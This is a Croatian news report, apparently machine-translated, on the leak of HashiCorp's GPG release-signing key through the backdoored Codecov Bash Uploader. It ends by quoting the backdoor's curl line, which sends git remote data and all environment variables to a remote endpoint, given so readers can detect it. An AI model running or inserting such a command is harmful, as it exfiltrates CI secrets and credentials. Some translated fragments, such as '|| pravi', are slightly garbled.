HashiCorp, poznat po razvoju alata otvorenog koda Vagrant, Packer, Nomad i Terraform, najavio je curenje privatnog GPG ključa koji se koristi za izradu digitalnih potpisa koji provjeravaju izdanja. Napadači koji su dobili pristup GPG ključu potencijalno bi mogli napraviti skrivene promjene na HashiCorp proizvodima verificirajući ih ispravnim digitalnim potpisom. Istodobno, tvrtka je izjavila da tijekom revizije nisu identificirani nikakvi tragovi pokušaja takvih izmjena.
Trenutno je ugroženi GPG ključ opozvan i umjesto njega je uveden novi ključ. Problem je utjecao samo na provjeru pomoću datoteka SHA256SUM i SHA256SUM.sig, a nije utjecao na generiranje digitalnih potpisa za Linux DEB i RPM pakete koji se dostavljaju putem releases.hashicorp.com, kao ni na mehanizme provjere izdanja za macOS i Windows (AuthentiCode) .
Do curenja je došlo zbog korištenja skripte Codecov Bash Uploader (codecov-bash) u infrastrukturi, dizajnirane za preuzimanje izvješća o pokrivenosti iz kontinuiranih integracijskih sustava. Tijekom napada na tvrtku Codecov, u navedenu skriptu skriven je backdoor preko kojeg su lozinke i ključevi za enkripciju slani na poslužitelj napadača.
Kako bi hakirali, napadači su iskoristili pogrešku u procesu stvaranja Codecov Docker slike, koja je omogućila izdvajanje podataka o pristupu GCS-u (Google Cloud Storage), potrebnih za izmjene skripte Bash Uploader distribuirane iz codecov-a. io web mjesto. Promjene su napravljene još 31. siječnja, ostale su neotkrivene dva mjeseca i omogućile su napadačima izvlačenje informacija pohranjenih u okruženjima sustava kontinuirane integracije korisnika. Korištenjem dodanog zlonamjernog koda, napadači bi mogli dobiti informacije o testiranom Git repozitoriju i svim varijablama okruženja, uključujući tokene, ključeve za enkripciju i lozinke, koje se prenose kontinuiranim integracijskim sustavima za organiziranje pristupa aplikacijskom kodu, repozitoriju i uslugama kao što su Amazon Web Services i GitHub .
Osim izravnog poziva, skripta Codecov Bash Uploader korištena je u sklopu drugih uploadera, poput Codecov-action (Github), Codecov-circleci-orb i Codecov-bitrise-step, čiji su korisnici također pogođeni problemom. Svim korisnicima codecov-bash i srodnih proizvoda preporučuje se revizija njihove infrastrukture, kao i promjena lozinki i ključeva za šifriranje. Možete provjeriti prisutnost stražnjih vrata u skripti prisutnošću retka curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || pravi
Izvor: opennet.ru